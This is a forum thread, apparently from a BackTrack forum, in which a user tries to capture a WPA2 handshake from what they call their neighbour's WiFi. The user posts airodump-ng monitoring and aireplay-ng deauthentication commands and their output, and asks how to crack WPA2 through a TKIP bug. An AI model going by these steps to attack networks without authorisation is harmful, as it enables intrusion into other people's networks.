Thread: Problem with WPA-HandShake

Just burned his ISO

Talking Problem with WPA-HandShake

Hi@All
    I'm tring to crack a WPA2 protected WiFi. I've red lots of "manuals" and explanation about the argument but I'm little disable at using Linux (now I'm running my Intrepid Ubuntu =) )

I meet any problem...I'll try to explain me better I can but if something is difficult 2 understand please post and I'll try to answer the questions.

Ok. It's what I've done (wlan0 is my WiFi iface)
    Code:
    $ sudo su
    # ifconfig wlan0 down
    # iwconfig wlan0 mode monitor
    # ifconfig wlan0 up
    Is the same thing than use airmon-ng? I've red the man of airmon-ng but it only say that u can use this script for bring the wireless device (wlan0) into monitor mode.
    Anyway

Code:
    cd *****
    airodump-ng -w fra --channel 11 wlan0  (11 is the channel of the AP...seen before using airodump-ng)
    ok now airodump is listening from wlan0.

Code:
    $ sudo aireplay-ng --deauth 1 -a 00:13:c8:cc:22:** -c 00:17:c4:76:30:** wlan0	
    17:35:37  Sending DeAuth to station   -- STMAC: [00:17:C4:76:30:**]
    Into the airodump window nothing happened! I still tried to do it but, from what I can see, the injecition fail.

Code:
    $ sudo aireplay-ng --test wlan0

18:04:01  Trying broadcast probe requests...
    18:04:02  No Answer...
    18:04:02  Found 1 AP 

18:04:02  Trying directed probe requests...
    18:04:02  00:13:C8:CC:22:B3 - channel: 11 - 'Broadcom'
    18:04:11  0/30: 0%
    What does it mean? Maybe the client is too far? Looking at airodump i can see his MAC but sometime there are lost packets.

I can't understand why the injection fail and i don't see the WPA-handShake.I've tried to send 10 consecutives deauthentication packets but nothing! >.<

Maybe the WiFi of the naeghtboor in unrackable? It's WPA2..

Waiting for response =)

Giu°(

ps: here you are a report of what i can see in the airodump-ng page

Code:
     CH 11 ][ Elapsed: 4 hours 25 mins ][ 2009-12-27 21:48 

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:13:C8:CC:22:B3   -1  83   126192      690    3  11  48  WPA2 CCMP   PSK  Broadcom     
     00:0C:F6:50:D2:17   -1   0     1225        0    0  11  54. WPA2             Sitecom50D217

BSSID              STATION            PWR  Lost  Packets  Probes                          

00:13:C8:CC:22:B3  00:17:C4:76:30:9C   -1  1676    10923  Broadcom

Anyone know how to crack the WPA2 PSK using the TKIP bug?I've read anything about a way to crack the TKIP protocol without using a WordList...Anyone can help me?

Thanks

Super Moderator Archangel-Amael's Avatar

Quote Originally Posted by tiasorella View Post
    Hi@All
    I'm tring to crack a WPA2 protected WiFi. I've red lots of "manuals" and explanation about the argument but I'm little disable at using Linux (now I'm running my Intrepid Ubuntu =) )
    We do not support Ubuntu.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.